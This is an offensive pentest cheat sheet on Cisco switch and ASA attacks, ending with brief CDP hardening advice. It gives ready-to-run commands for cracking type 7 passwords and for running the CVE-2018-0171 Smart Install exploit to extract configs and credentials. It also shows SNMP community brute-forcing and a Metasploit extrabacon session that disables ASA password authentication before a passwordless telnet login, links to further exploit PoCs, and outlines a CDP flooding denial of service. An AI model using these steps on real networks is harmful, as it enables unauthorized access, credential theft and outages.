#
Cisco Exploits
Some exploits and CVE for Cisco Switches.
#
Cisco - Password 7 Crack
If you managed to extract the configuration file, you can crack the password 7.
Github Link : https://github.com/claudijd/c7decrypt
Install c7decrypt
gem install c7decryptUsage
c7decrypt -s 04480E051A33490E
c7decrypt -f hashes.txt
#
CVE-2018-0171 Cisco Smart Exploit
This Python 3 script uses port 4786 on a Cisco device running SmartInstall to exploit CVE-2018-0171. With the use of this exploit, an attacker can craft a payload, send it to the Cisco device, and then extract the contents of the running-config file.
- Github Link https://github.com/AlrikRr/Cisco-Smart-Exploit
The Cisco Smart Exploit script can:
- Extract the running-config file
- Parse and decrypt secret 7 hashes
- Parse plain text passwords
- Parse all the Community String
# Target a single Cisco Switch
python3 cisco-se.py -i 192.168.10.1
# Target a list of Cisco Switches
python3 cisco-se.py -f ip_list.txt
# Target a running-config file
python3 cisco-se.py -c running-config.txtFor the -f FILE option, here is an example using nmap:
nmap -p 4786 10.20.30.0/24 --open -Pn -oG - | awk '/Up$/{print $2}' > ip_list.txt
#
Cisco ASA - CVE-2016-6366
Cisco ASA is the Operating System Cisco Adaptive Security Appliance
PoC Link : https://github.com/RiskSense-Ops/CVE-2016-6366.git
Vulnerable Simple Network Management Protocol (SNMP), BufferOverflow on SNMP (versions 1, 2c, and 3) when enabled on a virtual or physical Cisco ASA device.
The attacker must know the SNMP community string to exploit this vulnerability.
If snmp enabled, try to crack the password using msf
msf auxiliary(snmp_login) > set PASSWORD public
PASSWORD => public
msf auxiliary(snmp_login) > set RHOSTS 192.168.206.114
RHOSTS => 192.168.206.114
msf auxiliary(snmp_login) > runNow try to exploit the CVE with msf
msf auxiliary(cisco_asa_extrabacon) > show options
Module options (auxiliary/admin/cisco/cisco_asa_extrabacon):
Name Current Setting Required Description
---- --------------- -------- -----------
COMMUNITY public yes SNMP Community String
MODE pass-disable yes Enable or disable the password auth functions (Accepted: pass-disable, pass-enable)
RETRIES 1 yes SNMP Retries
RHOST 192.168.206.114 yes The target address
RPORT 161 yes The target port
TIMEOUT 1 yes SNMP Timeout
msf auxiliary(cisco_asa_extrabacon) > runIf exploit successully, please try to login it with telnet. The attacker can login into the cisco device with no password.
$ telnet 192.168.206.114
ciscoasa> ?
#
CVE-2020-3452 ASA-FTD
Basic exploit abusing CVE-2020-3452 to enumerate the standard files accessible in the Web Directory of CISCO ASA/FTD applicances.
Github Link : https://github.com/3ndG4me/CVE-2020-3452-Exploit
#
Cisco ASA - CVE-2018-01001 RCE
GithubLink : https://gist.github.com/paralax/3692f7c758a28d0bad29a3102ebbcff2
Module MSF exist with this exploit
This module exploits a vulnerability in the Cisco AnyConnect VPN
ASA 6,0,0 to 6.2.2
https://www.cvedetails.com/cve/CVE-2018-0101/
#
CDP Flooding
DDOS Any cisco devices that use CDP and store the CDP in its table. Send a CDP packet every 1ms and wait until 5 minutes
#
Leak information
Capture CDP Traffic can lead to information disclosure on the network configuration
#
Recommandations
- Disable CDP on every port
- Uplink port can stay enable
To enable CDP on a specific interface, use cdp enable command on the interface configuration mode. By default CDP is already enabled. You can also disable CDP by using no cdp enable command.
Switch(config-if)# cdp enable
Switch(config-if)# no cdp enableTo configure cdp Hello time and Hold time, you can use the below commands. Time is mentioned as seconds.
Switch(config)# cdp timer 50
Switch(config)# cdp holdtime 100To verify CDP, you can use general CDP verification commands below:
Switch# show cdp
Switch# show cdp interface
Switch# show cdp neighbors
Switch# show cdp entry
Switch# show cdp traffic